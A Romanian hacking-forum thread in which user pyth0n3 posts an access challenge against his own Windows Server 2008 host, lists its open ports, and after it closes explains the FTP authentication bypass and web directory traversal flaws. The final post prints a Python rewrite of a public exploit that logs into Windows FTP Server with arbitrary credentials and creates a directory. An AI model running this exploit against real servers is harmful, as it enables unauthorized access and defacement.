Jump to content
pyth0n3

Obtineti access Reloaded

Recommended Posts

Posted (edited)

Target = 01101000 01110100 01110100 01110000 00111010 00101111

00101111 01101101 01110111 01100101 01100010 01110011 01100101

01110010 01110110 01100101 01110010 00101110 01110011 01100101

01101100 01100110 01101001 01110000 00101110 01101111 01110010

01100111

1. crea?i un director in serverul ftp sau un file in care pune?i semn?tura

2. pune?i o semn?tura pe pagina web

TIME = 24 hours

Watch online in real time streaming the screen of server

host = 68 74 74 70 3a 2f 2f 6d 77 65 62 73 65 72 76 65 72 2e 73 65 6c 66 69 70 2e 6f 72 67 3a 38 39

Information Gathering:

23 port open protocol tcp service telnet

53 port open protocol tcp service domain

80 port open protocol tcp service http

89 port open protocol tcp service su-mit-tg

21 port open protocol tcp service ftp

5801 port open protocol tcp service vnc-http-1

5901 port open protocol tcp service vnc-1

Operating System is Windows Server 2008 SP2

P.S.

As prefera s? modifica?i pagina HTML care e ?i s? ad?uga?i doar o semn?tura intrun tag , in acest caz to?i au posibilitatea s? î?i pun? semn?tura

Edited by pyth0n3
Posted (edited)

HINT: Pt a modifica pagina web trebuie s? ave?i access la server [you need the credentials]

Take a look behind the curtain ...

The web server is vulnerable

Watch on-line in real time streaming the screen of server

host = 68 74 74 70 3a 2f 2f 6d 77 65 62 73 65 72 76 65 72 2e 73 65 6c 66 69 70 2e 6f 72 67 3a 38 39

Edited by pyth0n3
Posted (edited)

Host is down

Au ob?inut access ftp urmatorii useri :

Flubber from RST

Gnix from ptrace.net

Au ob?inut access la webserver urm?torii useri:

Flubber from RST

Serverul ftp era vulnerabil la Authentication-Bypass

Serverul Web era vulnerabil la Directory-Atraversal

Codul pt a vedea structura de la directory era un simplu

Space == %20

Watch online video ==>> Obtineti Access part1

Watch online video ==>> Obtineti Access part2

Download full video ===>> Here

Aici este codul pe care l-am rescris in python pt Authentication-Bypass ftp

# Original exploit was written in perl
# Exploit link: [ http://www.exploit-db.com/exploits/12119/]
# Software Link: [http://www.windowsftpserver.com/free_download.html]
# Windows FTP Server is vulnerable to authentication-bypass
# that will allow attackers to connect
# with any username and password
# I just rewrote this code in python

import socket
import sys
import time


print '[+] Wait...'
time.sleep(1)
host = '0.0.0.0'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def alert(msg):
print >>sys.stderr, msg
sys.exit(1)
try:
s.connect((host, 21))
except:
alert('[+] Failed ' + host +' is down...')
print "[+] Sending fake username..."
time.sleep(1)
s.send("USER whatever_here\r\n" )
print "[+] Sending fake password..."
time.sleep(1)
s.send("PASS something_here\r\n" )
print '[+] Creating a directory ...'
time.sleep(1)
s.send('MKD ' + ' owned' + '\r\n')
s.recv(1024)
print '[+] Work done i will exit...'
time.sleep(1)
s.close()


#END

P.S. dac? pe cineva îl intereseaz? poate s? ma contacteze ?i vom putea face împreuna diverse alte challenge pe diverse sisteme operative

Daca va intereseaza si ma ajuta?i vom face lucruri diverse

Peace!

Edited by pyth0n3

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...